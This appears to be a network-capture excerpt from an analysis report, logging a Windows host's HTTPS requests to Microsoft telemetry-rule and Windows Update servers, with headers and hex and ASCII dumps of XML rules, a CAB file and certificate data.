                                                                                                                                                                                                            2024-11-22 03:26:46 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                                                            Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            15192.168.2.44982413.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:26:55 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:26:56 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:56 GMT
                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                            Content-Length: 218853
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public
                                                                                                                                                                                                            Last-Modified: Thu, 21 Nov 2024 12:25:08 GMT
                                                                                                                                                                                                            ETag: "0x8DD0A27899CAFB6"
                                                                                                                                                                                                            x-ms-request-id: 0e3600b6-201e-0096-7125-3cace6000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032656Z-178bfbc474bxkclvhC1NYC69g4000000029000000000fhed
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:26:56 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                            Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                            2024-11-22 03:26:56 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                            Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                            2024-11-22 03:26:56 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                            Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                            2024-11-22 03:26:56 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                            Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                            2024-11-22 03:26:56 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                            Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                            2024-11-22 03:26:56 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                            Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                            2024-11-22 03:26:56 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                            Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                            2024-11-22 03:26:57 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                            Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                            2024-11-22 03:26:57 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                            2024-11-22 03:26:57 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            16192.168.2.44983052.149.20.212443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:26:57 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pDmcNf2Vnao8OO7&MD=UZBBkmrN HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                                                            2024-11-22 03:26:57 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                            MS-CorrelationId: ab0405fe-e144-48bd-9dfd-8f22c3df1292
                                                                                                                                                                                                            MS-RequestId: 6357199e-1bc7-41a4-85a6-ca309e505417
                                                                                                                                                                                                            MS-CV: 4vm75Z2c+USWBYJc.0
                                                                                                                                                                                                            X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:57 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Content-Length: 30005
                                                                                                                                                                                                            2024-11-22 03:26:57 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                            Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                            2024-11-22 03:26:57 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                            Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            17192.168.2.44983713.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:26:58 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:26:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:59 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 3788
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                            x-ms-request-id: 5299024a-c01e-0079-4d47-3ce51a000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032659Z-174c587ffdf8fcgwhC1TEBnn7000000000wg00000000t2u3
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:26:59 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            18192.168.2.44983913.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:26:58 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:26:59 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:59 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 2160
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                            x-ms-request-id: 2aa1f1ad-b01e-003d-7c43-3cd32c000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032659Z-174c587ffdf8lw6dhC1TEBkgs800000000w0000000009qky
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:26:59 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            19192.168.2.44983613.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:26:58 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
